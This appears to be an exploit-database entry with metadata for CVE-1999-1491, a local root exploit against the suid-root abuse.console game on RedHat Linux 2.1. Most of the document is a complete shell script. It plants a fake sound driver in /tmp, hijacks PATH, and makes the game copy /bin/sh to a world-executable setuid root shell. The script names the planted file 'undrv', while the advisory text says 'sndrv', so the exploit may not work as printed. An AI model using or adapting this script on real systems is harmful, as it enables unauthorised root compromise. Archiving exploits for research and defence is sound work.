RedHat Linux 2.1 - 'abuse.console' Local Privilege Escalation
Author: David J Meltzer
type: local
platform: linux
port:
date_added: 1996-02-02
date_updated: 2012-06-18
verified: 1
codes: CVE-1999-1491;OSVDB-13539
tags:
aliases:
screenshot_url:
application_url:
raw file: 19279.sh
type: local
platform: linux
port:
date_added: 1996-02-02
date_updated: 2012-06-18
verified: 1
codes: CVE-1999-1491;OSVDB-13539
tags:
aliases:
screenshot_url:
application_url:
raw file: 19279.sh
source: https://www.securityfocus.com/bid/354/info Abuse is a game that is included with RedHat Linux 2.1 in the games package. The console version, abuse.console, is suid-root and will load the program sndrv as root without checking for an absolute pathname. This means that sndrv can be substituted in another directory by a regular user and used to locally execute arbitrary code on the target machine. Consequences are a root compromise. Exploit: #!/bin/sh # # abuser.sh # exploits a security hole in abuse to create # a suid root shell /tmp/abuser on a linux # Red Hat 2.1 system with the games package # installed. # # by Dave M. (davem@cmu.edu) # echo ================ abuser.sh - gain root on Linux Red Hat 2.1 system echo ================ Checking system vulnerability if test -u /usr/lib/games/abuse/abuse.console then echo ++++++++++++++++ System appears vulnerable. cd /tmp cat << _EOF_ > /tmp/undrv #!/bin/sh /bin/cp /bin/sh /tmp/abuser /bin/chmod 4777 /tmp/abuser _EOF_ chmod +x /tmp/undrv PATH=/tmp echo ================ Executing Abuse /usr/lib/games/abuse/abuse.console /bin/rm /tmp/undrv if test -u /tmp/abuser then echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/abuser else echo ---------------- Exploit failed fi else echo ---------------- This machine does not appear to be vulnerable. fi
Copyright © 2024 Irfan TOOR all rights reserved.